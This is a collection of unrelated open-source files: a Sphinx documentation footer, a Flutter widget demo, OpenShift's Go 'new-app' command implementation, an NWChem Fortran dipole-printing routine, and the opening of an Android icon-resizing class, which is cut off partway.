</dd></dl> </dd></dl> </div> <div class="section" id="module-supplychainpy.bot"> <span id="module-contents"></span><h2>Module contents<a class="headerlink" href="#module-supplychainpy.bot" title="Permalink to this headline">¶</a></h2> </div> </div> </div> <div class="articleComments"> </div> </div> <footer> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2016, Kevin Fasusi. </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT:'./', VERSION:'0.0.4', COLLAPSE_INDEX:false, FILE_SUFFIX:'.html', HAS_SOURCE: true, SOURCELINK_SUFFIX: '.txt' }; </script> <script type="text/javascript" src="_static/jquery.js"></script> <script type="text/javascript" src="_static/underscore.js"></script> <script type="text/javascript" src="_static/doctools.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.StickyNav.enable(); }); </script> </body> </html>
{ "pile_set_name": "Github" }
import 'package:flutter/cupertino.dart'; import 'package:flutter/material.dart'; void main() { runApp(new IntegrationApp()); } class IntegrationApp extends StatelessWidget { @override Widget build(BuildContext context) { return new MaterialApp( home: new MaterialPage(), ); } } class MaterialPage extends StatelessWidget { @override Widget build(BuildContext context) { return new Scaffold( appBar: new AppBar( title: const Text('Material Page'), ), body: new Center( child: new RaisedButton( child: const Text('Cupertino Page'), onPressed: () { Navigator.push(context, new CupertinoPageRoute( builder: (BuildContext context) => new CupertinoPage() )); }, ) ), ); } } class CupertinoPage extends StatelessWidget { @override Widget build(BuildContext context) { return new CupertinoPageScaffold( navigationBar: const CupertinoNavigationBar( middle: const Text('Cupertino Page'), ), child: new Center( child: new CupertinoButton( color: CupertinoColors.activeBlue, child: const Text('Mixed Page 1'), onPressed: () { Navigator.push(context, new MaterialPageRoute( builder: (BuildContext context) => new MixedPage1() )); } ), ), ); } } class MixedPage1 extends StatelessWidget { @override Widget build(BuildContext context) { return new Scaffold( appBar: new CupertinoNavigationBar( middle: const Text('Cupertino in Material'), trailing: new IconButton( // Material button icon: new Icon(Icons.search), onPressed: () {}, ), backgroundColor: const Color(0xFFF8F8F8), ), // No automatic tab switching without CupertinoTabScaffold of course. bottomNavigationBar: new CupertinoTabBar( items: <BottomNavigationBarItem>[ const BottomNavigationBarItem( icon: const Icon(CupertinoIcons.info), title: const Text('Item 1'), ), const BottomNavigationBarItem( icon: const Icon(CupertinoIcons.conversation_bubble), title: const Text('Item 2'), ), ], ), body: new Center( child: new CupertinoButton( color: CupertinoColors.activeBlue, child: const Text('Mixed Page 2'), onPressed: () { Navigator.push(context, new CupertinoPageRoute( builder: (BuildContext context) => new MixedPage2() )); }, ) ), ); } } class MixedPage2 extends StatelessWidget { @override Widget build(BuildContext context) { return new CupertinoPageScaffold( navigationBar: new AppBar( title: const Text('Material in Cupertino'), actions: <Widget>[ new CupertinoButton( child: const Icon(CupertinoIcons.search), onPressed: () {}, ), ], ), child: new Center( child: const Text( 'The end', style: const TextStyle( fontSize: 36.0, color: Colors.black, decoration: TextDecoration.none, ), ), ), ); } }
{ "pile_set_name": "Github" }
package cmd import ( "bytes" "fmt" "io" "io/ioutil" "os" "sort" "strings" "time" "github.com/MakeNowJust/heredoc" docker "github.com/fsouza/go-dockerclient" "github.com/golang/glog" "github.com/spf13/cobra" kapi "k8s.io/kubernetes/pkg/api" kapierrors "k8s.io/kubernetes/pkg/api/errors" "k8s.io/kubernetes/pkg/client/restclient" kclient "k8s.io/kubernetes/pkg/client/unversioned" ctl "k8s.io/kubernetes/pkg/kubectl" kcmd "k8s.io/kubernetes/pkg/kubectl/cmd" kcmdutil "k8s.io/kubernetes/pkg/kubectl/cmd/util" "k8s.io/kubernetes/pkg/kubectl/resource" "k8s.io/kubernetes/pkg/runtime" "k8s.io/kubernetes/pkg/util/errors" "k8s.io/kubernetes/pkg/util/sets" "k8s.io/kubernetes/pkg/util/wait" buildapi "github.com/openshift/origin/pkg/build/api" cmdutil "github.com/openshift/origin/pkg/cmd/util" "github.com/openshift/origin/pkg/cmd/util/clientcmd" dockerutil "github.com/openshift/origin/pkg/cmd/util/docker" configcmd "github.com/openshift/origin/pkg/config/cmd" newapp "github.com/openshift/origin/pkg/generate/app" newcmd "github.com/openshift/origin/pkg/generate/app/cmd" "github.com/openshift/origin/pkg/generate/git" imageapi "github.com/openshift/origin/pkg/image/api" "github.com/openshift/origin/pkg/util" ) type usage interface { UsageError(commandName string) string } const ( newAppLong = ` Create a new application by specifying source code, templates, and/or images This command will try to build up the components of an application using images, templates, or code that has a public repository. It will lookup the images on the local Docker installation (if available), a Docker registry, an integrated image stream, or stored templates. If you specify a source code URL, it will set up a build that takes your source code and converts it into an image that can run inside of a pod. Local source must be in a git repository that has a remote repository that the server can see. The images will be deployed via a deployment configuration, and a service will be connected to the first public port of the app. You may either specify components using the various existing flags or let new-app autodetect what kind of components you have provided. If you provide source code, a new build will be automatically triggered. You can use '%[1]s status' to check the progress.` newAppExample = ` # List all local templates and image streams that can be used to create an app %[1]s new-app --list # Create an application based on the source code in the current git repository (with a public remote) # and a Docker image %[1]s new-app . --docker-image=repo/langimage # Create a Ruby application based on the provided [image]~[source code] combination %[1]s new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git # Use the public Docker Hub MySQL image to create an app. Generated artifacts will be labeled with db=mysql %[1]s new-app mysql MYSQL_USER=user MYSQL_PASSWORD=pass MYSQL_DATABASE=testdb -l db=mysql # Use a MySQL image in a private registry to create an app and override application artifacts' names %[1]s new-app --docker-image=myregistry.com/mycompany/mysql --name=private # Create an application from a remote repository using its beta4 branch %[1]s new-app https://github.com/openshift/ruby-hello-world#beta4 # Create an application based on a stored template, explicitly setting a parameter value %[1]s new-app --template=ruby-helloworld-sample --param=MYSQL_USER=admin # Create an application from a remote repository and specify a context directory %[1]s new-app https://github.com/youruser/yourgitrepo --context-dir=src/build # Create an application based on a template file, explicitly setting a parameter value %[1]s new-app --file=./example/myapp/template.json --param=MYSQL_USER=admin # Search all templates, image streams, and Docker images for the ones that match "ruby" %[1]s new-app --search ruby # Search for "ruby", but only in stored templates (--template, --image-stream and --docker-image # can be used to filter search results) %[1]s new-app --search --template=ruby # Search for "ruby" in stored templates and print the output as an YAML %[1]s new-app --search --template=ruby --output=yaml` newAppNoInput = `You must specify one or more images, image streams, templates, or source code locations to create an application. To list all local templates and image streams, use: %[1]s new-app -L To search templates, image streams, and Docker images that match the arguments provided, use: %[1]s new-app -S php %[1]s new-app -S --template=ruby %[1]s new-app -S --image-stream=mysql %[1]s new-app -S --docker-image=python ` ) type NewAppOptions struct { Action configcmd.BulkAction Config *newcmd.AppConfig CommandPath string CommandName string Out, ErrOut io.Writer Output string PrintObject func(obj runtime.Object) error LogsForObject LogsForObjectFunc } // NewCmdNewApplication implements the OpenShift cli new-app command func NewCmdNewApplication(commandName string, f *clientcmd.Factory, out io.Writer) *cobra.Command { config := newcmd.NewAppConfig() config.Deploy = true options := &NewAppOptions{Config: config} cmd := &cobra.Command{ Use: "new-app (IMAGE | IMAGESTREAM | TEMPLATE | PATH | URL ...)", Short: "Create a new application", Long: fmt.Sprintf(newAppLong, commandName), Example: fmt.Sprintf(newAppExample, commandName), SuggestFor: []string{"app", "application"}, Run: func(c *cobra.Command, args []string) { kcmdutil.CheckErr(options.Complete(commandName, f, c, args, out)) err := options.Run() if err == cmdutil.ErrExit { os.Exit(1) } kcmdutil.CheckErr(err) }, } cmd.Flags().BoolVar(&config.AsTestDeployment, "as-test", config.AsTestDeployment, "If true create this application as a test deployment, which validates that the deployment succeeds and then scales down.") cmd.Flags().StringSliceVar(&config.SourceRepositories, "code", config.SourceRepositories, "Source code to use to build this application.") cmd.Flags().StringVar(&config.ContextDir, "context-dir", "", "Context directory to be used for the build.") cmd.Flags().StringSliceVarP(&config.ImageStreams, "image", "", config.ImageStreams, "Name of an image stream to use in the app. (deprecated)") cmd.Flags().MarkDeprecated("image", "use --image-stream instead") cmd.Flags().StringSliceVarP(&config.ImageStreams, "image-stream", "i", config.ImageStreams, "Name of an image stream to use in the app.") cmd.Flags().StringSliceVar(&config.DockerImages, "docker-image", config.DockerImages, "Name of a Docker image to include in the app.") cmd.Flags().StringSliceVar(&config.Templates, "template", config.Templates, "Name of a stored template to use in the app.") cmd.Flags().StringSliceVarP(&config.TemplateFiles, "file", "f", config.TemplateFiles, "Path to a template file to use for the app.") cmd.MarkFlagFilename("file", "yaml", "yml", "json") cmd.Flags().StringSliceVarP(&config.TemplateParameters, "param", "p", config.TemplateParameters, "Specify a list of key value pairs (e.g., -p FOO=BAR,BAR=FOO) to set/override parameter values in the template.") cmd.Flags().StringSliceVar(&config.Groups, "group", config.Groups, "Indicate components that should be grouped together as <comp1>+<comp2>.") cmd.Flags().StringSliceVarP(&config.Environment, "env", "e", config.Environment, "Specify key-value pairs of environment variables to set into each container. This doesn't apply to objects created from a template, use parameters instead.") cmd.Flags().StringVar(&config.Name, "name", "", "Set name to use for generated application artifacts") cmd.Flags().StringVar(&config.Strategy, "strategy", "", "Specify the build strategy to use if you don't want to detect (docker|source).") cmd.Flags().StringP("labels", "l", "", "Label to set in all resources for this application.") cmd.Flags().BoolVar(&config.InsecureRegistry, "insecure-registry", false, "If true, indicates that the referenced Docker images are on insecure registries and should bypass certificate checking") cmd.Flags().BoolVarP(&config.AsList, "list", "L", false, "List all local templates and image streams that can be used to create.") cmd.Flags().BoolVarP(&config.AsSearch, "search", "S", false, "Search all templates, image streams, and Docker images that match the arguments provided.") cmd.Flags().BoolVar(&config.AllowMissingImages, "allow-missing-images", false, "If true, indicates that referenced Docker images that cannot be found locally or in a registry should still be used.") cmd.Flags().BoolVar(&config.AllowMissingImageStreamTags, "allow-missing-imagestream-tags", false, "If true, indicates that image stream tags that don't exist should still be used.") cmd.Flags().BoolVar(&config.AllowSecretUse, "grant-install-rights", false, "If true, a component that requires access to your account may use your token to install software into your project. Only grant images you trust the right to run with your token.") cmd.Flags().BoolVar(&config.SkipGeneration, "no-install", false, "Do not attempt to run images that describe themselves as being installable") options.Action.BindForOutput(cmd.Flags()) cmd.Flags().String("output-version", "", "The preferred API versions of the output objects") return cmd } // Complete sets any default behavior for the command func (o *NewAppOptions) Complete(commandName string, f *clientcmd.Factory, c *cobra.Command, args []string, out io.Writer) error { o.Out = out o.ErrOut = c.OutOrStderr() o.Output = kcmdutil.GetFlagString(c, "output") // Only output="" should print descriptions of intermediate steps. Everything // else should print only some specific output (json, yaml, go-template, ...) if len(o.Output) == 0 { o.Config.Out = o.Out } else { o.Config.Out = ioutil.Discard } o.Config.ErrOut = o.ErrOut o.Action.Out, o.Action.ErrOut = o.Out, o.ErrOut o.Action.Bulk.Mapper = clientcmd.ResourceMapper(f) o.Action.Bulk.Op = configcmd.Create // Retry is used to support previous versions of the API server that will // consider the presence of an unknown trigger type to be an error. o.Action.Bulk.Retry = retryBuildConfig o.Config.DryRun = o.Action.DryRun o.CommandPath = c.CommandPath() o.CommandName = commandName mapper, _ := f.Object(false) o.PrintObject = cmdutil.VersionedPrintObject(f.PrintObject, c, mapper, out) o.LogsForObject = f.LogsForObject if err := CompleteAppConfig(o.Config, f, c, args); err != nil { return err } if err := setAppConfigLabels(c, o.Config); err != nil { return err } return nil } // Run contains all the necessary functionality for the OpenShift cli new-app command func (o *NewAppOptions) Run() error { config := o.Config out := o.Out if config.Querying() { result, err := config.RunQuery() if err != nil { return handleRunError(err, o.CommandName, o.CommandPath) } if o.Action.ShouldPrint() { return o.PrintObject(result.List) } return printHumanReadableQueryResult(result, out, o.CommandName) } checkGitInstalled(out) result, err := config.Run() if err := handleRunError(err, o.CommandName, o.CommandPath); err != nil { return err } // if the user has set the "app" label explicitly on their objects in the template, // we should not return a failure when we can't set it ourselves. ignoreLabelFailure := false if len(config.Labels) == 0 && len(result.Name) > 0 { config.Labels = map[string]string{"app": result.Name} ignoreLabelFailure = true } if err := setLabels(config.Labels, result, ignoreLabelFailure); err != nil { return err } if err := setAnnotations(map[string]string{newcmd.GeneratedByNamespace: newcmd.GeneratedByNewApp}, result); err != nil { return err } if o.Action.ShouldPrint() { return o.PrintObject(result.List) } if result.GeneratedJobs { o.Action.Compact() } if errs := o.Action.WithMessage(configcmd.CreateMessage(config.Labels), "created").Run(result.List, result.Namespace); len(errs) > 0 { return cmdutil.ErrExit } if !o.Action.Verbose() || o.Action.DryRun { return nil } hasMissingRepo := false installing := []*kapi.Pod{} indent := o.Action.DefaultIndent() for _, item := range result.List.Items { switch t := item.(type) { case *kapi.Pod: if t.Annotations[newcmd.GeneratedForJob] == "true" { installing = append(installing, t) } case *buildapi.BuildConfig: triggered := false for _, trigger := range t.Spec.Triggers { switch trigger.Type { case buildapi.ImageChangeBuildTriggerType, buildapi.ConfigChangeBuildTriggerType: triggered = true break } } if triggered { fmt.Fprintf(out, "%[1]sBuild scheduled, use '%[3]s logs -f bc/%[2]s' to track its progress.\n", indent, t.Name, o.CommandName) } else { fmt.Fprintf(out, "%[1]sUse '%[3]s start-build %[2]s' to start a build.\n", indent, t.Name, o.CommandName) } case *imageapi.ImageStream: if len(t.Status.DockerImageRepository) == 0 { if hasMissingRepo { continue } hasMissingRepo = true fmt.Fprintf(out, "%sWARNING: No Docker registry has been configured with the server. Automatic builds and deployments may not function.\n", indent) } } } switch { case len(installing) == 1: jobInput := installing[0].Annotations[newcmd.GeneratedForJobFor] return followInstallation(config, jobInput, installing[0], o.LogsForObject) case len(installing) > 1: for i := range installing { fmt.Fprintf(out, "%sTrack installation of %s with '%s logs %s'.\n", indent, installing[i].Name, o.CommandName, installing[i].Name) } case len(result.List.Items) > 0: fmt.Fprintf(out, "%sRun '%s %s' to view your app.\n", indent, o.CommandName, StatusRecommendedName) } return nil } type LogsForObjectFunc func(object, options runtime.Object) (*restclient.Request, error) func followInstallation(config *newcmd.AppConfig, input string, pod *kapi.Pod, logsForObjectFn LogsForObjectFunc) error { fmt.Fprintf(config.Out, "--> Installing ...\n") // we cannot retrieve logs until the pod is out of pending // TODO: move this to the server side podClient := config.KubeClient.Pods(pod.Namespace) if err := wait.PollImmediate(500*time.Millisecond, 60*time.Second, installationStarted(podClient, pod.Name, config.KubeClient.Secrets(pod.Namespace))); err != nil { return err } opts := &kcmd.LogsOptions{ Namespace: pod.Namespace, ResourceArg: pod.Name, Options: &kapi.PodLogOptions{ Follow: true, Container: pod.Spec.Containers[0].Name, }, Mapper: config.Mapper, Typer: config.Typer, ClientMapper: config.ClientMapper, LogsForObject: logsForObjectFn, Out: config.Out, } _, logErr := opts.RunLogs() // status of the pod may take tens of seconds to propagate if err := wait.PollImmediate(500*time.Millisecond, 30*time.Second, installationComplete(podClient, pod.Name, config.Out)); err != nil { if err == wait.ErrWaitTimeout { if logErr != nil { // output the log error if one occurred err = logErr } else { err = fmt.Errorf("installation may not have completed, see logs for %q for more information", pod.Name) } } return err } return nil } func installationStarted(c kclient.PodInterface, name string, s kclient.SecretsInterface) wait.ConditionFunc { return func() (bool, error) { pod, err := c.Get(name) if err != nil { return false, err } if pod.Status.Phase == kapi.PodPending { return false, nil } // delete a secret named the same as the pod if it exists if secret, err := s.Get(name); err == nil { if secret.Annotations[newcmd.GeneratedForJob] == "true" && secret.Annotations[newcmd.GeneratedForJobFor] == pod.Annotations[newcmd.GeneratedForJobFor] { if err := s.Delete(name); err != nil { glog.V(4).Infof("Failed to delete install secret %s: %v", name, err) } } } return true, nil } } func installationComplete(c kclient.PodInterface, name string, out io.Writer) wait.ConditionFunc { return func() (bool, error) { pod, err := c.Get(name) if err != nil { if kapierrors.IsNotFound(err) { return false, fmt.Errorf("installation pod was deleted; unable to determine whether it completed successfully") } return false, nil } switch pod.Status.Phase { case kapi.PodSucceeded: fmt.Fprintf(out, "--> Success\n") if err := c.Delete(name, nil); err != nil { glog.V(4).Infof("Failed to delete install pod %s: %v", name, err) } return true, nil case kapi.PodFailed: return true, fmt.Errorf("installation of %q did not complete successfully", name) default: return false, nil } } } func setAppConfigLabels(c *cobra.Command, config *newcmd.AppConfig) error { labelStr := kcmdutil.GetFlagString(c, "labels") if len(labelStr) != 0 { var err error config.Labels, err = ctl.ParseLabels(labelStr) if err != nil { return err } } return nil } // getDockerClient returns a client capable of communicating with the local // docker daemon. If an error occurs (such as no local daemon being available), // it will return nil. func getDockerClient() (*docker.Client, error) { dockerClient, _, err := dockerutil.NewHelper().GetClient() if err == nil { if err = dockerClient.Ping(); err != nil { glog.V(4).Infof("Docker client did not respond to a ping: %v", err) return nil, err } return dockerClient, nil } glog.V(2).Infof("No local Docker daemon detected: %v", err) return nil, err } func CompleteAppConfig(config *newcmd.AppConfig, f *clientcmd.Factory, c *cobra.Command, args []string) error { mapper, typer := f.Object(false) if config.Mapper == nil { config.Mapper = mapper } if config.Typer == nil { config.Typer = typer } if config.ClientMapper == nil { config.ClientMapper = resource.ClientMapperFunc(f.ClientForMapping) } namespace, _, err := f.DefaultNamespace() if err != nil { return err } osclient, kclient, err := f.Clients() if err != nil { return err } config.KubeClient = kclient dockerClient, _ := getDockerClient() config.SetOpenShiftClient(osclient, namespace, dockerClient) if config.AllowSecretUse { cfg, err := f.OpenShiftClientConfig.ClientConfig() if err != nil { return err } config.SecretAccessor = newConfigSecretRetriever(cfg) } unknown := config.AddArguments(args) if len(unknown) != 0 { return kcmdutil.UsageError(c, "Did not recognize the following arguments: %v", unknown) } if config.AllowMissingImages && config.AsSearch { return kcmdutil.UsageError(c, "--allow-missing-images and --search are mutually exclusive.") } if len(config.SourceImage) != 0 && len(config.SourceImagePath) == 0 { return kcmdutil.UsageError(c, "--source-image-path must be specified when --source-image is specified.") } if len(config.SourceImage) == 0 && len(config.SourceImagePath) != 0 { return kcmdutil.UsageError(c, "--source-image must be specified when --source-image-path is specified.") } return nil } func setAnnotations(annotations map[string]string, result *newcmd.AppResult) error { for _, object := range result.List.Items { err := util.AddObjectAnnotations(object, annotations) if err != nil { return err } } return nil } func setLabels(labels map[string]string, result *newcmd.AppResult, ignoreFailure bool) error { for _, object := range result.List.Items { err := util.AddObjectLabels(object, labels) if err != nil && !ignoreFailure { return err } } return nil } // isInvalidTriggerError returns true if the given error is // a validation error that contains 'invalid trigger type' in its // error message. This error is returned from older servers that // consider the presence of unknown trigger types to be an error. func isInvalidTriggerError(err error) bool { if !kapierrors.IsInvalid(err) { return false } statusErr, ok := err.(*kapierrors.StatusError) if !ok { return false } return strings.Contains(statusErr.Status().Message, "invalid trigger type") } // retryBuildConfig determines if the given error is caused by an invalid trigger // error on a BuildConfig. If that is the case, it will remove all triggers with a // type that is not in the whitelist for an older server. func retryBuildConfig(info *resource.Info, err error) runtime.Object { triggerTypeWhiteList := map[buildapi.BuildTriggerType]struct{}{ buildapi.GitHubWebHookBuildTriggerType: {}, buildapi.GenericWebHookBuildTriggerType: {}, buildapi.ImageChangeBuildTriggerType: {}, } if info.Mapping.GroupVersionKind.GroupKind() == buildapi.Kind("BuildConfig") && isInvalidTriggerError(err) { bc, ok := info.Object.(*buildapi.BuildConfig) if !ok { return nil } triggers := []buildapi.BuildTriggerPolicy{} for _, t := range bc.Spec.Triggers { if _, inList := triggerTypeWhiteList[t.Type]; inList { triggers = append(triggers, t) } } bc.Spec.Triggers = triggers return bc } return nil } func handleRunError(err error, commandName, commandPath string) error { if err == nil { return nil } errs := []error{err} if agg, ok := err.(errors.Aggregate); ok { errs = agg.Errors() } groups := errorGroups{} for _, err := range errs { transformError(err, commandName, commandPath, groups) } buf := &bytes.Buffer{} for _, group := range groups { fmt.Fprint(buf, kcmdutil.MultipleErrors("error: ", group.errs)) if len(group.suggestion) > 0 { fmt.Fprintln(buf) } fmt.Fprint(buf, group.suggestion) } return fmt.Errorf(buf.String()) } type errorGroup struct { errs []error suggestion string } type errorGroups map[string]errorGroup func (g errorGroups) Add(group string, suggestion string, err error, errs ...error) { all := g[group] all.errs = append(all.errs, errs...) all.errs = append(all.errs, err) all.suggestion = suggestion g[group] = all } func transformError(err error, commandName, commandPath string, groups errorGroups) { switch t := err.(type) { case newcmd.ErrRequiresExplicitAccess: if t.Input.Token != nil && t.Input.Token.ServiceAccount { groups.Add( "explicit-access-installer", heredoc.Doc(` WARNING: This will allow the pod to create and manage resources within your namespace - ensure you trust the image with those permissions before you continue. You can see more information about the image by adding the --dry-run flag. If you trust the provided image, include the flag --grant-install-rights.`, ), fmt.Errorf("installing %q requires an 'installer' service account with project editor access", t.Match.Value), ) } else { groups.Add( "explicit-access-you", heredoc.Doc(` WARNING: This will allow the pod to act as you across the entire cluster - ensure you trust the image with those permissions before you continue. You can see more information about the image by adding the --dry-run flag. If you trust the provided image, include the flag --grant-install-rights.`, ), fmt.Errorf("installing %q requires that you grant the image access to run with your credentials", t.Match.Value), ) } return case newapp.ErrNoMatch: groups.Add( "no-matches", heredoc.Docf(` The '%[1]s' command will match arguments to the following types: 1. Images tagged into image streams in the current project or the 'openshift' project - if you don't specify a tag, we'll add ':latest' 2. Images in the Docker Hub, on remote registries, or on the local Docker engine 3. Templates in the current project or the 'openshift' project 4. Git repository URLs or local paths that point to Git repositories --allow-missing-images can be used to point to an image that does not exist yet. See '%[1]s -h' for examples.`, commandPath, ), t, t.Errs..., ) return case newapp.ErrMultipleMatches: buf := &bytes.Buffer{} for i, match := range t.Matches { // If we have more than 5 matches, stop output and recommend searching // after the fifth if i >= 5 { groups.Add( "multiple-matches", heredoc.Docf(` The argument %[1]q could apply to the following Docker images, OpenShift image streams, or templates: %[2]sTo view a full list of matches, use '%[3]s new-app -S %[1]s'`, t.Value, buf.String(), commandName, ), t, t.Errs..., ) return } fmt.Fprintf(buf, "* %s\n", match.Description) fmt.Fprintf(buf, " Use %[1]s to specify this image or template\n\n", match.Argument) } groups.Add( "multiple-matches", heredoc.Docf(` The argument %[1]q could apply to the following Docker images, OpenShift image streams, or templates: %[2]s`, t.Value, buf.String(), ), t, t.Errs..., ) return case newapp.ErrPartialMatch: buf := &bytes.Buffer{} fmt.Fprintf(buf, "* %s\n", t.Match.Description) fmt.Fprintf(buf, " Use %[1]s to specify this image or template\n\n", t.Match.Argument) groups.Add( "partial-match", heredoc.Docf(` The argument %[1]q only partially matched the following Docker image, OpenShift image stream, or template: %[2]s`, t.Value, buf.String(), ), t, t.Errs..., ) return case newapp.ErrNoTagsFound: buf := &bytes.Buffer{} fmt.Fprintf(buf, " Use --allow-missing-imagestream-tags to use this image stream\n\n") groups.Add( "no-tags", heredoc.Docf(` The image stream %[1]q exists, but it has no tags. %[2]s`, t.Match.Name, buf.String(), ), t, t.Errs..., ) return } switch err { case errNoTokenAvailable: // TODO: improve by allowing token generation groups.Add("", "", fmt.Errorf("to install components you must be logged in with an OAuth token (instead of only a certificate)")) case newcmd.ErrNoInputs: // TODO: suggest things to the user groups.Add("", "", usageError(commandPath, newAppNoInput, commandName)) default: groups.Add("", "", err) } } func usageError(commandPath, format string, args ...interface{}) error { msg := fmt.Sprintf(format, args...) return fmt.Errorf("%s\nSee '%s -h' for help and examples.", msg, commandPath) } func printHumanReadableQueryResult(r *newcmd.QueryResult, out io.Writer, commandName string) error { if len(r.Matches) == 0 { return fmt.Errorf("no matches found") } templates := newapp.ComponentMatches{} imageStreams := newapp.ComponentMatches{} dockerImages := newapp.ComponentMatches{} for _, match := range r.Matches { switch { case match.IsTemplate(): templates = append(templates, match) case match.IsImage() && match.ImageStream != nil: imageStreams = append(imageStreams, match) case match.IsImage() && match.Image != nil: dockerImages = append(dockerImages, match) } } sort.Sort(newapp.ScoredComponentMatches(templates)) sort.Sort(newapp.ScoredComponentMatches(imageStreams)) sort.Sort(newapp.ScoredComponentMatches(dockerImages)) if len(templates) > 0 { fmt.Fprintf(out, "Templates (%s new-app --template=<template>)\n", commandName) fmt.Fprintln(out, "-----") for _, match := range templates { template := match.Template description := template.ObjectMeta.Annotations["description"] fmt.Fprintln(out, template.Name) fmt.Fprintf(out, " Project: %v\n", template.Namespace) if len(description) > 0 { fmt.Fprintf(out, " %v\n", description) } } fmt.Fprintln(out) } if len(imageStreams) > 0 { fmt.Fprintf(out, "Image streams (%s new-app --image-stream=<image-stream> [--code=<source>])\n", commandName) fmt.Fprintln(out, "-----") for _, match := range imageStreams { imageStream := match.ImageStream description := imageStream.ObjectMeta.Annotations["description"] tags := "<none>" if len(imageStream.Status.Tags) > 0 { set := sets.NewString() for tag := range imageStream.Status.Tags { set.Insert(tag) } tags = strings.Join(set.List(), ", ") } fmt.Fprintln(out, imageStream.Name) fmt.Fprintf(out, " Project: %v\n", imageStream.Namespace) if len(imageStream.Spec.DockerImageRepository) > 0 { fmt.Fprintf(out, " Tracks: %v\n", imageStream.Spec.DockerImageRepository) } fmt.Fprintf(out, " Tags: %v\n", tags) if len(description) > 0 { fmt.Fprintf(out, " %v\n", description) } } fmt.Fprintln(out) } if len(dockerImages) > 0 { fmt.Fprintf(out, "Docker images (%s new-app --docker-image=<docker-image> [--code=<source>])\n", commandName) fmt.Fprintln(out, "-----") for _, match := range dockerImages { image := match.Image name, tag, ok := imageapi.SplitImageStreamTag(match.Name) if !ok { name = match.Name tag = match.ImageTag } fmt.Fprintln(out, name) fmt.Fprintf(out, " Registry: %v\n", match.Meta["registry"]) fmt.Fprintf(out, " Tags: %v\n", tag) if len(image.Comment) > 0 { fmt.Fprintf(out, " %v\n", image.Comment) } } fmt.Fprintln(out) } return nil } type configSecretRetriever struct { config *restclient.Config } func newConfigSecretRetriever(config *restclient.Config) newapp.SecretAccessor { return &configSecretRetriever{config} } var errNoTokenAvailable = fmt.Errorf("you are not logged in with a token - unable to provide a secret to the installable component") func (r *configSecretRetriever) Token() (string, error) { if len(r.config.BearerToken) > 0 { return r.config.BearerToken, nil } return "", errNoTokenAvailable } func (r *configSecretRetriever) CACert() (string, error) { if len(r.config.CAData) > 0 { return string(r.config.CAData), nil } if len(r.config.CAFile) > 0 { data, err := ioutil.ReadFile(r.config.CAFile) if err != nil { return "", fmt.Errorf("unable to read CA cert from config %s: %v", r.config.CAFile, err) } return string(data), nil } return "", nil } func checkGitInstalled(w io.Writer) { if !git.IsGitInstalled() { fmt.Fprintf(w, "warning: Cannot find git. Ensure that it is installed and in your path. Git is required to work with git repositories.\n") } }
{ "pile_set_name": "Github" }
subroutine dimqm_printDipole(rtdb, muind, icmplx, lpprint) c c c c c implicit none #include "errquit.fh" #include "inp.fh" #include "rtdb.fh" #include "stdio.fh" #include "nwc_const.fh" #include "mafdecls.fh" #include "global.fh" #include "dimqm_constants.fh" #include "dimqm.fh" c Input variables integer rtdb integer icmplx double precision muind(3,nDIM,icmplx) c double precision qind(nDIM, icmplx) logical lpprint c c Local variables double precision diptot(3, icmplx) character*60 dd character*60 d if(ga_nodeid().ne.0) return diptot = SUM(muind, DIM = 2) dd = $ '=============================================================' d = $ '-------------------------------------------------------------' c BLAS matrix-matrix multiply to add in charge term if(lpprint) then write(luout,'(/1x,a)') dd write(luout,'(1x,a)') $ 'Total induced dipole moment in DIM system :' write(luout,'(1x,a)') d if(icmplx == 1) then write(luout,'(2x,a,2x,3f16.8)') 'A.U.:', diptot(:,1) write(luout,'(2x,a,1x,3f16.8)') 'Debye:', diptot(:,1)*AU2DEBYE else write(luout,'(1x,a)') 'A.U.' write(luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1) write(luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2) write(luout,'(1x,a)') d write(luout,'(1x,a)') 'Debye' write(luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1)*AU2DEBYE write(luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2)*AU2DEBYE end if write(luout,'(1x,a/)') dd else write(luout,'(1x,a)') $ 'Total induced dipole moment in DIM system :' if(icmplx == 1) then write(luout,'(3f14.8)') diptot(:,1) else write (luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1) write (luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2) end if end if end subroutine dimqm_printDipole
{ "pile_set_name": "Github" }
package com.oasisfeng.android.ui; import android.content.res.Resources; import android.graphics.Bitmap; import android.graphics.Canvas; import android.graphics.Paint; import android.graphics.PaintFlagsDrawFilter; import android.graphics.PixelFormat; import android.graphics.Rect; import android.graphics.drawable.BitmapDrawable; import android.graphics.drawable.Drawable; import android.graphics.drawable.PaintDrawable; import androidx.annotation.UiThread; /** * Utility class to resize icons to match default icon size. * * Derived from {@link android.app.LauncherActivity.IconResizer} */ public class IconResizer { // Code is borrowed from com.android.launcher.Utilities. private final int mIconWidth, mIconHeight; private final Rect mOldBounds = new Rect(); private final Canvas mCanvas = new Canvas(); public IconResizer() { this((int) Resources.getSystem().getDimension(android.R.dimen.app_icon_size)); } public IconResizer(final int size) { mCanvas.setDrawFilter(new PaintFlagsDrawFilter(Paint.DITHER_FLAG, Paint.FILTER_BITMAP_FLAG)); mIconWidth = mIconHeight = size; } /** * Returns a Drawable representing the thumbnail of the specified Drawable. * The size of the thumbnail is defined by the dimension * android.R.dimen.launcher_application_icon_size. * * This method is not thread-safe and should be invoked on the UI thread only. * * @param icon The icon to get a thumbnail of. * * @return A thumbnail for the specified icon or the icon itself if the * thumbnail could not be created. */ @UiThread public Drawable createIconThumbnail(Drawable icon) { int width = mIconWidth; int height = mIconHeight; final int iconWidth = icon.getIntrinsicWidth(); final int iconHeight = icon.getIntrinsicHeight(); if (icon instanceof PaintDrawable) { final PaintDrawable painter = (PaintDrawable) icon; painter.setIntrinsicWidth(width); 